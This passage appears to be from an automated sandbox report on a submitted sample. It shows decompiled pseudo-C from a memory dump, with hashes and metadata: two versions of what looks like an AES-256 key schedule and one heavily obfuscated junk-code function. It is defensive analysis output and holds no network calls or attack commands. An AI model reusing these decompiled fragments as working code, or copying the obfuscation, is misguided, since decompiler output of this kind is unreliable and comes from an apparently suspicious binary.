                  • Instruction ID: 76a49e33ade7a9b5138e34287fa85fb3e74c7fd2d53550b1d9a203cb803e84a2
                  • Opcode Fuzzy Hash: 9a223b0828a6c5d96318e2a6225e6fdca3fcdc5435f2df56dd78a9df59862a16
                  • Instruction Fuzzy Hash: 11914032518795DBDB16CF38D88AB423FB6F742720B48438EC4B2865E2D779252ACB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 35%
                  			E011444C0(void* __ecx, void* __eflags, signed int _a4, signed int _a12, signed int _a16, intOrPtr _a20) {
                  				char _v256;
                  				char _v272;
                  				signed int __ebx;
                  				signed int __edi;
                  				void* __ebp;
                  				signed int _t75;
                  				intOrPtr _t77;
                  				intOrPtr* _t78;
                  				signed char _t84;
                  				void* _t91;
                  				void* _t95;
                  
                  				_pop(_t91);
                  				asm("les edi, [edi]");
                  				if(__eflags != 0) {
                  					_t77 =  *((intOrPtr*)(_t75 % _t84 - 0x73))();
                  					_t6 = _t95 + _t77;
                  					_t78 =  *_t6;
                  					 *_t6 = _t77;
                  					 *_t78 =  *_t78 + _t78;
                  					_push(_t78);
                  					E0115FA77();
                  					_t9 = _t91 + 0x804; // 0x804
                  					E0115FA77(_t9,  &_v256, 0x100);
                  					_t11 = _t91 + 0x904; // 0x904
                  					E0115FA77(_t11,  &_v272, 0xc);
                  					return _t91;
                  				} else {
                  					 *__ecx =  *__ecx & 0x00000055;
                  					__eflags =  *__ecx;
                  					__ebp = __esp;
                  					__ecx = _a16;
                  					__eax =  *__ecx;
                  					__edx = _a12;
                  					_push(__ebx);
                  					_push(__esi);
                  					_push(__edi);
                  					__esi = __eax;
                  					asm("ror esi, 0x8");
                  					__esi = __eax & 0xff00ff00;
                  					asm("rol eax, 0x8");
                  					 *__edx = __esi;
                  					__esi =  *(__ecx + 4);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 4) = __edi;
                  					__esi =  *(__ecx + 8);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 8) = __edi;
                  					__esi =  *(__ecx + 0xc);
                  					__eax = __edx + 4;
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0xc) = __edi;
                  					__esi =  *(__ecx + 0x10);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0x10) = __edi;
                  					__esi =  *(__ecx + 0x14);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0x14) = __edi;
                  					__esi =  *(__ecx + 0x18);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0x18) = __edi;
                  					__ecx =  *(__ecx + 0x1c);
                  					__esi = __ecx;
                  					asm("ror esi, 0x8");
                  					__esi = __ecx & 0xff00ff00;
                  					asm("rol ecx, 0x8");
                  					__esi = __esi | __ecx;
                  					__eflags = _a20 - 0x100;
                  					 *(__edx + 0x1c) = __esi;
                  					if(_a20 != 0x100) {
                  						L7:
                  						_pop(__edi);
                  						_pop(__esi);
                  						__eax = __eax | 0xffffffff;
                  						__eflags = __eax;
                  						_pop(__ebx);
                  						return __eax;
                  					} else {
                  						__esi = _a4;
                  						__ebx = 0;
                  						__eflags = 0;
                  						_a12 = 0;
                  						while(1) {
                  							__edi =  *(__eax + 0x18);
                  							 *(__esi + __ebx + 0x904) & 0x000000ff = ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x10;
                  							__edi = __edi >> 0x10;
                  							__edi >> 0x00000010 & 0x000000ff =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4);
                  							 *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010;
                  							__edi = __edi >> 8;
                  							__edi >> 0x00000008 & 0x000000ff =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4);
                  							__edx =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
                  							( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 8 = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
                  							__edi = __edi >> 0x18;
                  							__edi >> 0x00000018 & 0x000000ff =  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
                  							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
                  							__edi = __edi & 0x000000ff;
                  							 *(__esi + 4 + (__edi & 0x000000ff) * 4) =  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
                  							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
                  							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00 ^  *(__eax - 4);
                  							__edx =  *__eax;
                  							__edx =  *__eax ^ __ecx;
                  							 *(__eax + 0x1c) = __ecx;
                  							__ecx =  *(__eax + 4);
                  							__ecx =  *(__eax + 4) ^ __edx;
                  							 *(__eax + 0x20) = __edx;
                  							__edx =  *(__eax + 8);
                  							__edx =  *(__eax + 8) ^ __ecx;
                  							 *(__eax + 0x24) = __ecx;
                  							 *(__eax + 0x28) = __edx;
                  							__eflags = __ebx - 6;
                  							if(__ebx == 6) {
                  								break;
                  							}
                  							__edx = __edx >> 0x18;
                  							__edx >> 0x00000018 & 0x000000ff =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4);
                  							__edx = __edx >> 0x10;
                  							__edx >> 0x00000010 & 0x000000ff =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4);
                  							__ecx =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000;
                  							__ebx =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
                  							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 8;
                  							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
                  							__edx = __edx >> 8;
                  							__ebx = __edx >> 0x00000008 & 0x000000ff;
                  							__ebx =  *(__esi + 4 + (__edx >> 0x00000008 & 0x000000ff) * 4);
                  							__edx = __edx & 0x000000ff;
                  							__edx =  *(__esi + 5 + __edx * 4) & 0x000000ff;
                  							__ecx = __ecx ^ __ebx;
                  							__ebx = _a12;
                  							__ecx = __ecx ^ __edx;
                  							__ecx = __ecx ^  *(__eax + 0xc);
                  							__edx =  *(__eax + 0x10);
                  							__edx =  *(__eax + 0x10) ^ __ecx;
                  							 *(__eax + 0x2c) = __ecx;
                  							__ecx =  *(__eax + 0x14);
                  							__ecx =  *(__eax + 0x14) ^ __edx;
                  							 *(__eax + 0x34) = __ecx;
                  							__ecx = __ecx ^ __edi;
                  							__ebx = _a12 + 1;
                  							 *(__eax + 0x30) = __edx;
                  							 *(__eax + 0x38) = __ecx;
                  							__eax = __eax + 0x20;
                  							_a12 = __ebx;
                  							__eflags = __ebx - 7;
                  							if(__ebx < 7) {
                  								continue;
                  							} else {
                  								goto L7;
                  							}
                  							goto L9;
                  						}
                  						_pop(__edi);
                  						_pop(__esi);
                  						__eax = 0xe;
                  						_pop(__ebx);
                  						return 0xe;
                  					}
                  				}
                  				L9:
                  			}















                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bdf3ae78eb16012a1617dc754252206166292fc1b40f6e617d08486b588c09e
                  • Instruction ID: 367273778a008fcf4df03eb601205430dfcaba2c32afd5d02841f742991d827f
                  • Opcode Fuzzy Hash: 0bdf3ae78eb16012a1617dc754252206166292fc1b40f6e617d08486b588c09e
                  • Instruction Fuzzy Hash: D261C4B3E146214BD318CF19CC40672B792EFD8312B5B81BEDD1A8B257CA74A9529B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E0116236A(signed int __eax, signed int __ebx, signed char __ecx, signed int __edx, signed int __esi) {
                  				char _v3;
                  				char _v5;
                  				void* _v492138382;
                  				signed int _t26;
                  				signed int _t29;
                  				signed char _t31;
                  				signed char _t32;
                  				signed int _t34;
                  				signed char _t39;
                  				signed char _t46;
                  				signed int _t48;
                  				signed int _t52;
                  				signed int _t58;
                  				signed int _t60;
                  				signed int _t61;
                  				signed int _t69;
                  				signed int _t70;
                  				signed int _t72;
                  				signed int _t76;
                  
                  				_t61 = __esi;
                  				_t48 = __edx;
                  				_t39 = __ecx;
                  				_t34 = __ebx;
                  				_t26 = __eax;
                  				goto L1;
                  				do {
                  					do {
                  						do {
                  							do {
                  								do {
                  									L1:
                  									_t34 = _t34 + 0xb7;
                  									 *0xb0939ff7 =  *0xb0939ff7 >> 0x8c;
                  									asm("rol dword [0xe217dc62], 0x44");
                  									_t26 = _t26 -  *0x748f83e7 |  *0xc4bbc419;
                  									 *0x759084e5 =  *0x759084e5 & _t34;
                  									_t61 = _t61 - 1;
                  									_t48 = _t48 ^ 0x00000063;
                  									_push(0xb00218dd);
                  									asm("scasb");
                  								} while (_t48 >= 0);
                  								asm("lodsb");
                  								 *0xc1ddbd1c =  *0xc1ddbd1c & _t34;
                  								 *0xefa8e0cc =  &_v5;
                  								 *0x85c02c16 =  *0x85c02c16 - _t48;
                  								 *0xb2efca25 =  *0xb2efca25 ^  *0xefa8e0cc;
                  								asm("adc ah, [0xa8e0cc32]");
                  								_t61 = 0xef4544a1 |  *0xc6a616ef;
                  								_t69 =  &_v3;
                  								asm("adc ebp, [0xc1daa919]");
                  								_t39 = _t39 - 0x32 + 0x32;
                  								 *0xefa8e0cc =  *0xefa8e0cc ^ _t69;
                  								_t70 = _t69 & 0x75c83916;
                  							} while (_t70 > 0);
                  							_pop( *0xa8009977);
                  							 *0x45d8a8c4 =  *0x45d8a8c4 | _t70;
                  							 *0x173a7bc8 =  *0x173a7bc8 << 0x91;
                  							_push(_t48 -  *0xc68ff209);
                  							_t29 = _t26 +  *0x3816efa8 + 1;
                  							_push(_t29);
                  							 *0xef45d88d =  *0xef45d88d << 0xa5;
                  							asm("adc cl, 0x3a");
                  							asm("sbb ebx, 0xef45d88d");
                  							_push(_t29 &  *0x81d04116);
                  							_push( *0xef45d88d);
                  							_pop(_t31);
                  							 *0xaddd0fb4 = _t34;
                  							asm("sbb ebx, 0x87dbae16");
                  							_t52 =  *0x32ee16ef;
                  							 *0x1db40ffd =  *0x1db40ffd >> 0x38;
                  							_t76 = 0xef45d88d |  *0xe0cc3283;
                  							_push( *0xbe0b1c6d);
                  							 *0xcc32c1ef =  *0xcc32c1ef - 0xe0cc32c1;
                  							asm("ror byte [0x8a16efa8], 0x2f");
                  							_t34 =  *0xaddd0fb4 + 0xbe17ff2f;
                  							_t61 =  *0xcc32bfdd;
                  							 *0x16efa8e0 =  *0x16efa8e0 << 0xbd;
                  							_t26 = _t31 &  *0x32c5f7c6;
                  							 *0xefa8e0cc =  *0xefa8e0cc | _t52;
                  							 *0xfa34f216 =  *0xfa34f216 - _t61;
                  							_t48 = _t52 -  *0xb9d9b004;
                  							 *0xa8e0cc32 =  *0xa8e0cc32 - _t26;
                  							 *0xc62116ef =  *0xc62116ef + _t61;
                  							 *0x1ee67b3 =  *0x1ee67b3 - _t48;
                  							_t39 = _t39 - 1;
                  							 *0xa2f716d2 =  *0xa2f716d2 << 0xc1;
                  						} while ( *0xa2f716d2 <= 0);
                  						_t76 =  *0x395f828e;
                  						asm("sbb [0x36b616d2], cl");
                  						asm("rol dword [0xe0cc32cc], 0x19");
                  						asm("adc bl, [0xa816efa8]");
                  						 *0x9d8d8ce2 =  *0x9d8d8ce2 + _t34;
                  						 *0xcc32aece =  *0xcc32aece >> 0x51;
                  						asm("sbb ch, 0xe0");
                  						 *0x8e16efa8 =  *0x8e16efa8 << 0x4d;
                  						_t72 =  &_v492138382 ^  *0x9c01269e;
                  						 *0xcc32c1d7 =  *0xcc32c1d7 << 0xc0;
                  						_t26 = _t26 +  *0x16efa8e0;
                  						 *0x869af2ba = _t34;
                  						asm("scasd");
                  						asm("sbb [0x395fc3cc], ebp");
                  						asm("adc esi, [0xf5bda798]");
                  						asm("sbb [0x395fbed3], ebp");
                  						_t39 =  *0xf2c1ab9c - 1;
                  						asm("adc dh, 0xd2");
                  						 *0x1c621c16 =  *0x1c621c16 << 0xbe;
                  						 *0xc1dba407 =  *0xc1dba407 & _t48;
                  						 *0xa8e0cc32 =  *0xa8e0cc32 >> 0x4f;
                  						_t48 = _t48 ^  *0xa2fe16ef;
                  					} while (_t48 >= 0);
                  					asm("sbb al, 0xa8");
                  					 *0xd1b49ba0 =  *0xd1b49ba0 & _t39;
                  					_t26 = _t26 | 0x395fa899;
                  					_t46 = _t39 - 1;
                  					 *0xe0cc32c1 =  *0xe0cc32c1 - _t72;
                  					asm("adc al, 0xa8");
                  					 *0xccecc9b4 =  *0xccecc9b4 & 0x470c16ef;
                  					_t48 = ((0x470c16ef |  *0xc48616d2) ^  *0xe0cc32c1) + 0xa8;
                  					 *0xb70016ef =  *0xb70016ef + (_t61 |  *0x49395fc2);
                  					asm("adc bl, 0x88");
                  					asm("scasd");
                  					_pop(_t58);
                  					asm("rcr dword [0x16d24939], 0xf4");
                  					_t34 = (_t34 |  *0x45d8a8c4) + 0xf4be16ef - 0xa0 + 0xb4;
                  					asm("rol dword [0x8daddd0f], 0xf1");
                  					_pop( *0x16ef45d8);
                  					_t76 = _t76 - 1;
                  					asm("adc ch, [0x897790e0]");
                  					asm("ror byte [0xa8c4a800], 0xbc");
                  					 *0x16ef45d8 =  *0x16ef45d8 + 0x470c16ef;
                  					 *0x2bc09e3f = _t46;
                  					asm("adc cl, 0x63");
                  					 *0xc4a80082 =  *0xc4a80082 >> 0xcf;
                  					 *0xef45d8a8 =  *0xef45d8a8 >> 0xd3;
                  					_t61 =  *0xbc121f16;
                  					 *0xa10f9e2b =  *0xa10f9e2b - _t46;
                  					 *0x8840ecb2 =  *0x8840ecb2 ^ _t46;
                  					asm("sbb ebp, [0xe24b16ef]");
                  					asm("rcr dword [0x395fc2cc], 0x7");
                  					 *0x941616d2 =  *0x941616d2 << 0xb2;
                  					_push( *0xdec32e33);
                  					asm("adc [0xe0cc32c1], esp");
                  					asm("adc ch, 0xa8");
                  					asm("rcl dword [0xe26216ef], 0x79");
                  					_t39 =  *0xd8a8c4a8;
                  					 *0xd8a8c4a8 = _t46 - 1;
                  					_t60 = _t58 |  *0xf0cc319f |  *0xd6b616ef;
                  				} while (0x395fc0d6 < 0);
                  				 *0x52173a78 =  *0x52173a78 >> 0xcb;
                  				_t32 = _t26 + 1;
                  				_push(_t32);
                  				 *0xef45d88d =  *0xef45d88d ^ _t60;
                  				return _t32 | 0x00000016;
                  			}























                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1b5df0c3c5d8e47dd28f21c69f01f0dd5c786d84d1ea4724bdba55894e0f6b4b
                  • Instruction ID: b0677fab5c3dae04faae674c45a9b5fc977fa2729d72727f7168b9d0311e4ba3
                  • Opcode Fuzzy Hash: 1b5df0c3c5d8e47dd28f21c69f01f0dd5c786d84d1ea4724bdba55894e0f6b4b
                  • Instruction Fuzzy Hash: 6E810F72809790CFEB05DF78E8AA6463FB6FB86320708478DC9E2561E2C7701466CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E011444C7(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                  				signed int _t66;
                  				signed int* _t69;
                  				signed int* _t81;
                  				signed int _t94;
                  				signed int _t96;
                  				signed int _t106;
                  				signed int _t108;
                  				signed int* _t110;
                  				signed int _t127;
                  				signed int _t129;
                  				signed int _t133;
                  				signed int _t152;
                  				intOrPtr _t171;
                  
                  				_t81 = _a12;
                  				_t110 = _a8;
                  				asm("ror esi, 0x8");
                  				asm("rol eax, 0x8");
                  				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                  				_t66 =  &(_t110[1]);
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                  				asm("ror esi, 0x8");
                  				asm("rol ecx, 0x8");
                  				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                  				if(_a16 != 0x100) {
                  					L4:
                  					return _t66 | 0xffffffff;
                  				} else {
                  					_t171 = _a4;
                  					_t69 = 0;
                  					_a12 = 0;
                  					while(1) {
                  						_t152 =  *(_t66 + 0x18);
                  						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                  						_t127 =  *_t66 ^ _t94;
                  						 *(_t66 + 0x1c) = _t94;
                  						_t96 =  *(_t66 + 4) ^ _t127;
                  						 *(_t66 + 0x20) = _t127;
                  						_t129 =  *(_t66 + 8) ^ _t96;
                  						 *(_t66 + 0x24) = _t96;
                  						 *(_t66 + 0x28) = _t129;
                  						if(_t69 == 6) {
                  							break;
                  						}
                  						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                  						_t133 =  *(_t66 + 0x10) ^ _t106;
                  						 *(_t66 + 0x2c) = _t106;
                  						_t108 =  *(_t66 + 0x14) ^ _t133;
                  						 *(_t66 + 0x34) = _t108;
                  						_t69 =  &(_a12[0]);
                  						 *(_t66 + 0x30) = _t133;
                  						 *(_t66 + 0x38) = _t108 ^ _t152;
                  						_t66 = _t66 + 0x20;
                  						_a12 = _t69;
                  						if(_t69 < 7) {
                  							continue;
                  						} else {
                  							goto L4;
                  						}
                  						goto L6;
                  					}
                  					return 0xe;
                  				}
                  				L6:
                  			}

















                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                  • Instruction ID: 2d3b448c6c8bac16237797a0c5e220535281cd552e8d5a4f56889e72638521ca
                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                  • Instruction Fuzzy Hash: 7E5180B3E14A254BD318CE09CC40631B792FFD8312B5F81BADD199B357CA74E9529A90
                  Uniqueness

                  Uniqueness Score: -1.00%